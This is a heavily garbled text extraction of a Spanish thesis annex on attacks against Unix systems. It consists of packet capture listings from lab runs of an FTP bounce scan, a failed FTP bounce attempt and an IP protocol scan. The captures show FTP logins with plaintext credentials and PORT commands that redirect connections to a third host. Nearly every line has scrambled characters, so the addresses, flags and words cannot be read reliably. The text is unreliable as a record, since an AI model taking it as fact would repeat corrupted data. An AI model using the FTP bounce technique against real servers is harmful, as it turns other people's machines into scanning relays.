3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:1((00 Brag:02 TT2:+5 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:()7007+(9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6173 > 19(.16).0.30:>>> .# Paquete nro. 56 - Tiempo 0.9(61(5 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:99 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6173 $

B.2.*.. Ca"tura *-% FF! Bounce ,can


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000(7( 8P Origen: 00:0!:(9:90:(a:(7: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.100 i at 00:0!:(9:90:(a:(7 Paquete Nro: 3 - Tiempo: 0.0(3651

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J0 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -./N0 .eq10 2en10 3..11+60 T.=16((5)30 T.<$10 &.17 Paquete Nro: + - Tiempo: 0.0(3931 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: T,P De !rip!i%n: (1 > 3+691 -./N4 #,50 .eq10 #!611 &in15(+()0 2en10 3..11+60 &.13 T.=1()6910)939 T.<$16((5)30 Paquete Nro: 5 - Tiempo: 0.0(395) 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq11 #!611 &in15))) 2en10 T.=16((5)30 T.<$1()6910)939 Paquete Nro: 6 - Tiempo: 0.0(650) 8P Origen: 19(.16).0.30:61906 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa Paquete Nro: 7 - Tiempo: 0.0(65(1 8P Origen: 19(.16).0.30:61906 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa Paquete Nro: ) - Tiempo: 0.0536)( 8P Origen: 19(.16).0.1:53 -> 8P De tino: 19(.16).0.30:61906 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE re pon e4 No u!' name Paquete Nro: 9 - Tiempo: 0.05+790 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: ((0 !i!"on BTP er@er 9=er ion 6.002.: rea7E. Paquete Nro: 10 - Tiempo: 0.05+)(7 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq11 #!61+) &in15))) 2en10 T.=16((5)3) T.<$1()6910)973 Paquete Nro: 11 - Tiempo: (.3)6(5+ 8P Origen: 19(.16).0.(:5(067 -> 8P De tino: 7(.1+.(53.1(5:5((( Proto!o"o: T,P De !rip!i%n: 5(067 > 5((( -#,50 .eq10 #!610 &in163000 2en10 Paquete Nro: 1( - Tiempo: 7.056617 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: K.<$ mar!e"o Paquete Nro: 13 - Tiempo: 7.05)177 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: 331 Pa >or7 require7 for mar!e"o. Paquete Nro: 1+ - Tiempo: 7.05)(16 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq115 #!61)+ &in15))) 2en10 T.=16((75)9 T.<$1()6911579( Paquete Nro: 15 - Tiempo: 7.05)501 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: P#.. mar!epa Paquete Nro: 16 - Tiempo: 7.091067 8P Origen: 19(.16).0.30:56756 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+. de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: 17 - Tiempo: 7.0910)( 8P Origen: 19(.16).0.30:56756 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa Paquete Nro: 1) - Tiempo: 7.1157(1 8P Origen: 19(.16).0.1:53 -> 8P De tino: 19(.16).0.30:56756 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE re pon e4 No u!' name Paquete Nro: 19 - Tiempo: 7.116330 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: (30 K er mar!e"o "ogge7 in. Paquete Nro: (0 - Tiempo: 7.156+)7 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq131 #!61113 &in15))) 2en10 T.=16((7613 T.<$1()69115)3( Paquete Nro: (1 - Tiempo: 9.116513 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)404100404(( Paquete Nro: (( - Tiempo: 9.116990 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". Paquete Nro: (3 - Tiempo: 9.1170(0 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq156 #!611+3 &in15))) 2en10 T.=16(()103 T.<$1()69117)0) Paquete Nro: (+ - Tiempo: 9.1(0+70 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: (5 - Tiempo: 9.1((+91 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:(( Proto!o"o: T,P De !rip!i%n: (0 > (( -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(093 T.<$10 Paquete Nro: (6 - Tiempo: 9.1((50+ 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:(( Proto!o"o: T,P De !rip!i%n: (0 > (( -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(093 T.<$10 Paquete Nro: (7 - Tiempo: 9.1(671+ 8P Origen: 19(.16).0.100:(( -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: (( > (0 -$.T4 #,50 .eq10 #!611 &in10 2en10 Paquete Nro: () - Tiempo: 9.1(67(5 8P Origen: 19(.16).0.100:(( -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: (( > (0 -$.T4 #,50 .eq10 #!611 &in10 2en10 Paquete Nro: (9 - Tiempo: 9.16601( 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: +(5 ,anJt bui"7 7ata !onne!tion: ,onne!tion refu e7. Paquete Nro: 30 - Tiempo: 9.166(95 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)404100404)0 Paquete Nro: 31 - Tiempo: 9.1666(1

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+* de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". Paquete Nro: 3( - Tiempo: 9.166765 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: 33 - Tiempo: 9.16)))1 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(117 T.<$10 Paquete Nro: 3+ - Tiempo: 9.16))93 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(117 T.<$10 Paquete Nro: 35 - Tiempo: 9.17(133 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1+61953( T.<$13031(117 &.10 Paquete Nro: 36 - Tiempo: 9.17(1+5 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1+61953( T.<$13031(117 &.10 Paquete Nro: 37 - Tiempo: 9.17+05) 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -#,50 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( Paquete Nro: 3) - Tiempo: 9.17+071 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 37N10 (0 > )0 -#,50 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( Paquete Nro: 39 - Tiempo: 9.17+09+ 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: 150 Opening #.,88 mo7e 7ata !onne!tion for J;bin;" J. Paquete Nro: +0 - Tiempo: 9.175116 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: ((6 Tran fer !omp"ete. Paquete Nro: +1 - Tiempo: 9.17513( 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: BTP-D#T# De !rip!i%n: BTP Data: 5+5 bEte Paquete Nro: +( - Tiempo: 9.175136 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: BTP-D#T# De !rip!i%n: -T,P Out-Of-Or7er0 BTP Data: 5+5 bEte Paquete Nro: +3 - Tiempo: 9.175605 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -#,50 .eq11 #!615+7 &in130660 2en10 T.=1+619533 T.<$13031(135 Paquete Nro: ++ - Tiempo: 9.175611 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 +3N10 )0 > (0 -#,50 .eq11 #!615+7 &in130660 2en10 T.=1+619533 T.<$13031(135

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+2 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: +5 - Tiempo: 9.175)93 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: BTP-D#T# De !rip!i%n: BTP Data: 315 bEte Paquete Nro: +6 - Tiempo: 9.175)9) 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: BTP-D#T# De !rip!i%n: -T,P Out-Of-Or7er0 BTP Data: 315 bEte Paquete Nro: +7 - Tiempo: 9.175991 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq1316 #!615+7 &in131)56 2en10 T.=1+619533 T.<$13031(135 Paquete Nro: +) - Tiempo: 9.175995 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq1316 #!615+7 &in131)56 2en10 T.=1+619533 T.<$13031(135 Paquete Nro: +9 - Tiempo: 9.176(97 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq193 #!61306 &in15))) 2en10 T.=16(()11) T.<$1()69117)55 Paquete Nro: 50 - Tiempo: 9.176)+5 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 51 - Tiempo: 9.176)5( 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 5( - Tiempo: 9.176)66 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 53 - Tiempo: 9.176)70 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 5+ - Tiempo: 1(.3)7175 8P Origen: (16.155.193.160:5050 -> 8P De tino: 19(.16).0.(:+0319 Proto!o"o: T,P De !rip!i%n: 5050 > +0319 -#,50 .eq10 #!610 &in13331( 2en10 T.=1)(539313) T.<$16(())+5 Paquete Nro: 55 - Tiempo: 13.0)+(3( 8P Origen: 19(.16).0.(:+79)( -> 8P De tino: 6+.1(.(5.):5190 Proto!o"o: #83 De !rip!i%n: 5eep #"i@e Paquete Nro: 56 - Tiempo: 13.(51165 8P Origen: 6+.1(.(5.):5190 -> 8P De tino: 19(.16).0.(:+79)( Proto!o"o: T,P De !rip!i%n: 5190 > +79)( -#,50 .eq10 #!616 &in1163)+ 2en10 Paquete Nro: 57 - Tiempo: 1+.+16)7( 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -B8N4 #,50 .eq193 #!61306 &in15))) 2en10 T.=16((9+() T.<$1()69117)55 Paquete Nro: 5) - Tiempo: 1+.+17()3 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: T,P

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+- de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


De !rip!i%n: (1 > 3+691 -#,50 .eq1306 #!619+ &in16660) 2en10 T.=1()691(()+5 T.<$16((9+() Paquete Nro: 59 - Tiempo: 1+.+173(5 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: ((1 /ou !ou"7 at "ea t aE goo7bEe. Paquete Nro: 60 - Tiempo: 1+.+17339 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -$.T0 .eq19+ 2en10

B.2.**. Ca"tura *1% FF! Bounce Err8neo


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1+9(05(3 T.<$10 &.17 Paquete Nro: ( - Tiempo: 0.000333 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: T,P De !rip!i%n: (1 > 5+(50 -./N4 #,50 .eq10 #!611 &in1579( 2en10 3..11+60 T.=1173971 T.<$1+9(05(3 &.1( Paquete Nro: 3 - Tiempo: 0.000367 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq11 #!611 &in15))) 2en10 T.=1+9(05(3 T.<$1173971 Paquete Nro: + - Tiempo: 0.011+)6 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: ((0 9@ BTP7 (.0.+: Paquete Nro: 5 - Tiempo: 0.011530 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq11 #!61(1 &in15))) 2en10 T.=1+9(05(6 T.<$117397+ Paquete Nro: 6 - Tiempo: 7.0(1(03 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: K.<$ anonEmou Paquete Nro: 7 - Tiempo: 7.0(1391 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: T,P De !rip!i%n: (1 > 5+(50 -#,50 .eq1(1 #!6117 &in1579( 2en10 T.=1175(3( T.<$1+9(((7) Paquete Nro: ) - Tiempo: 7.0(163) 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 331 P"ea e pe!ifE t'e pa >or7. Paquete Nro: 9 - Tiempo: 7.0(1650 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq117 #!6155 &in15))) 2en10 T.=1+9(((7) T.<$1175(33 Paquete Nro: 10 - Tiempo: 7.0((+31 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: P#.. ->>>u erI Paquete Nro: 11 - Tiempo: 7.03((9+ 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: (30 2ogin u!!e fu".

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+1 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: 1( - Tiempo: 7.07(957 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq133 #!617) &in15))) 2en10 T.=1+9(((91 T.<$1175(3+ Paquete Nro: 13 - Tiempo: 9.0+093+ 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)404100404)0 Paquete Nro: 1+ - Tiempo: 9.0+15+5 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. Paquete Nro: 15 - Tiempo: 9.0+1576 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq15) #!611(9 &in15))) 2en10 T.=1+9((7)3 T.<$1175596 Paquete Nro: 16 - Tiempo: 9.0+)))5 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: 17 - Tiempo: 9.0+9763 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175597 T.<$10 &.1( Paquete Nro: 1) - Tiempo: 9.0+9771 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175597 T.<$10 &.1( Paquete Nro: 19 - Tiempo: 9.05006+ 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1369++7) T.<$1175597 &.10 Paquete Nro: (0 - Tiempo: 9.05006) 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1369++7) T.<$1175597 &.10 Paquete Nro: (1 - Tiempo: 9.061++1 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -#,50 .eq11 #!611 &in15)+0 2en10 T.=1175597 T.<$1369++7) Paquete Nro: (( - Tiempo: 9.061+50 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 (1N10 (0 > )0 -#,50 .eq11 #!611 &in15)+0 2en10 T.=1175597 T.<$1369++7) Paquete Nro: (3 - Tiempo: 9.061699 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 150 ?ere !ome t'e 7ire!torE "i ting. Paquete Nro: (+ - Tiempo: 9.061))+ 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -B8N4 #,50 .eq11 #!611 &in15)+0 2en10 T.=117559) T.<$1369++7) Paquete Nro: (5 - Tiempo: 9.061))) 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+5 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


De !rip!i%n: (0 > )0 -B8N4 #,50 .eq11 #!611 &in15)+0 2en10 T.=117559) T.<$1369++7) Paquete Nro: (6 - Tiempo: 9.066653 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -#,50 .eq11 #!61( &in130660 2en10 T.=1369++79 T.<$117559) Paquete Nro: (7 - Tiempo: 9.06666( 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 (6N10 )0 > (0 -#,50 .eq11 #!61( &in130660 2en10 T.=1369++79 T.<$117559) Paquete Nro: () - Tiempo: 9.0669+1 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq11 #!61( &in131)56 2en10 T.=1369++79 T.<$117559) Paquete Nro: (9 - Tiempo: 9.0669++ 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq11 #!61( &in131)56 2en10 T.=1369++79 T.<$117559) Paquete Nro: 30 - Tiempo: 9.06)((0 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -#,50 .eq1( #!61( &in15)+0 2en10 T.=1175599 T.<$1369++79 Paquete Nro: 31 - Tiempo: 9.06)((9 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 30N10 (0 > )0 -#,50 .eq1( #!61( &in15)+0 2en10 T.=1175599 T.<$1369++79 Paquete Nro: 3( - Tiempo: 9.06)+11 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: ((6 Dire!torE en7 O5. Paquete Nro: 33 - Tiempo: 9.069((1 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq16+ #!6119( &in15))) 2en10 T.=1+9((790 T.<$117559) Paquete Nro: 3+ - Tiempo: 9.069(59 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)4041004+43( Paquete Nro: 35 - Tiempo: 9.069773 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. Paquete Nro: 36 - Tiempo: 9.070695 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: 37 - Tiempo: 9.07(605 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:1056 Proto!o"o: T,P De !rip!i%n: (0 > 1056 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175600 T.<$10 &.1( Paquete Nro: 3) - Tiempo: 9.07(61+ 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:1056 Proto!o"o: T,P De !rip!i%n: (0 > 1056 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175600 T.<$10 &.1( Paquete Nro: 39 - Tiempo: 9.0731+)

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+J de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.100:1056 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: 1056 > (0 -$.T4 #,50 .eq11 #!611 &in10 2en10 Paquete Nro: +0 - Tiempo: 9.073155 8P Origen: 19(.16).0.100:1056 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: 1056 > (0 -$.T4 #,50 .eq11 #!611 &in10 2en10 Paquete Nro: +1 - Tiempo: 9.07+(0) 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 150 ?ere !ome t'e 7ire!torE "i ting. Paquete Nro: +( - Tiempo: 9.07+35( 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: ((6 Dire!torE en7 O5. Paquete Nro: +3 - Tiempo: 9.07+637 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq195 #!61306 &in15))) 2en10 T.=1+9((791 T.<$1175601 Paquete Nro: ++ - Tiempo: 1+.0731+5 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -B8N4 #,50 .eq195 #!61306 &in15))) 2en10 T.=1+9(+0+1 T.<$1175601 Paquete Nro: +5 - Tiempo: 1+.073639 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 500 OOP.: Paquete Nro: +6 - Tiempo: 1+.07367+ 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -$.T0 .eq196 &in10 2en10

B.2.*2. Ca"tura *1B% 7! !rotocol ,can


Paquete nro. 1 - Tiempo 0.000000 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.60

aE

19(.16).0.(

Paquete nro. ( - Tiempo 0.000795 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:0!:(9:a6:)0:7)

aE

19(.16).0.60

